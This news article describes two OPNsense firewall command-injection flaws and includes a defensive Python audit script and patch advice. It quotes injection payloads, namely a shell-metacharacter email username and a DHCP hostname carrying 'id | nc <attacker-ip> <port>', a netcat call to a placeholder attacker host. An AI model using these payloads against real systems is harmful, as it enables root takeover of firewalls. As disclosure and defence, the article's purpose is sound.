The open-source firewall community is on high alert today after critical security vulnerabilities in OPNsense were dragged into the light. The full technical details and proof-of-concept (PoC) exploit code for two severe flaws have been publicly disclosed.
The first flaw, tracked as CVE-2026-44194, is a surgical strike against the OPNsense user management system. Researchers discovered that while the firewall’s web interface performs validation, it explicitly allows valid email addresses to be used as usernames.
The “local-part” of an email address (the section before the @ symbol) can legally be wrapped in quotes. Inside these quotes, shell metacharacters are considered valid email characters. By crafting a malicious email address like "id>/conf/proof.txt"@example.com, an attacker with user-management privileges can bypass input validation entirely.
When the system attempts to sync this user, it passes the username directly into a shell command. The shell interprets the metacharacters, resulting in arbitrary command execution as root.
The second vulnerability, tracked as CVE-2026-45158, is even more pervasive, targeting the way OPNsense handles DHCP configurations on system interfaces.
A user with “page-interfaces” privileges can enable DHCP on an interface and set a custom hostname. This hostname is later written into a configuration file (dhclient.conf) without being sanitized.
The critical breakdown occurs when the system processes this configuration through a shell script. An attacker can provide a hostname embedded with commands, such as test"; media "aa; id | nc <attacker-ip> <port>"; }/. When the DHCP client runs or restarts, it executes the injected code, granting the attacker a remote root shell.
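Both flaws share one root cause: a value that passes format validation (an RFC-style email address, a DHCP hostname) is later interpolated into a shell command. As an added illustration, not OPNsense code or the researchers' PoC, the Python below shows why a validator that honours quoted local parts still accepts shell metacharacters, and gives allowlist checks a defender can run over existing usernames and DHCP hostnames (for example, exported from a configuration backup) to find entries that would be dangerous if handed to a shell. The sample user list and the hostname value 'edge"; id' are constructed for the demonstration.

```python
"""Audit helper: spot usernames and DHCP hostnames unsafe for shell interpolation.
Added illustration, not OPNsense code. Constructed sample data at the bottom."""
import re

# Simplified RFC 5321 shape: a dotted atom OR a quoted local part before the @.
_EMAIL_RE = re.compile(
    r'^(?:[A-Za-z0-9._%+-]+|"[^"\\]*")@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$')
# Characters a POSIX shell interprets when a value is pasted into a command line.
_SHELL_META = set(';|&<>`$(){}*?!"\'\\ \t\n')
# RFC 1123 host label: letters, digits, hyphens; no leading or trailing hyphen.
_HOST_LABEL = re.compile(r'^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$')

def is_rfc_style_email(value: str) -> bool:
    """What a permissive web-form validator accepts (quoted local parts included)."""
    return _EMAIL_RE.match(value) is not None

def shell_metachars(value: str) -> set:
    """Shell-special characters present in the value."""
    return {c for c in value if c in _SHELL_META}

def is_safe_username(value: str) -> bool:
    """Allowlist for usernames: plain emails pass, quoted local parts do not."""
    return re.fullmatch(r'[A-Za-z0-9._@+-]{1,64}', value) is not None

def is_safe_hostname(value: str) -> bool:
    """Allowlist for a DHCP client hostname: RFC 1123 labels, at most 253 chars."""
    if not value or len(value) > 253:
        return False
    return all(_HOST_LABEL.match(label) for label in value.split('.'))

def audit(users, hostnames):
    """Return (kind, value, offending shell characters) for every unsafe entry."""
    findings = []
    for u in users:
        if not is_safe_username(u):
            findings.append(("user", u, "".join(sorted(shell_metachars(u)))))
    for h in hostnames:
        if not is_safe_hostname(h):
            findings.append(("dhcphostname", h, "".join(sorted(shell_metachars(h)))))
    return findings

if __name__ == "__main__":
    # Constructed sample data: one entry of each shape quoted in the article.
    users = ["alice", "bob@example.com", '"id>/conf/proof.txt"@example.com']
    hosts = ["fw-edge01", 'edge"; id']
    for kind, value, meta in audit(users, hosts):
        print(f"{kind}: {value!r} passes format checks? "
              f"{is_rfc_style_email(value)} - shell metacharacters {meta!r}")
```

The quoted-local-part address is accepted by the email check yet rejected by the username allowlist; the fix on the application side is to apply such an allowlist and to pass values to helpers as argument vectors rather than through a shell string.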
The impact of these disclosures cannot be overstated. Because the injected commands execute as root, a successful attacker can achieve total system compromise, essentially taking over the entire firewall.
The public availability of the PoC code means that even low-skilled actors can now weaponize these flaws against unpatched systems.
OPNsense has moved swiftly to address these flaws.
- Affected Versions: All versions up to and including 26.1.7 are vulnerable.
- The Fix: Administrators must update to OPNsense 26.1.8 immediately.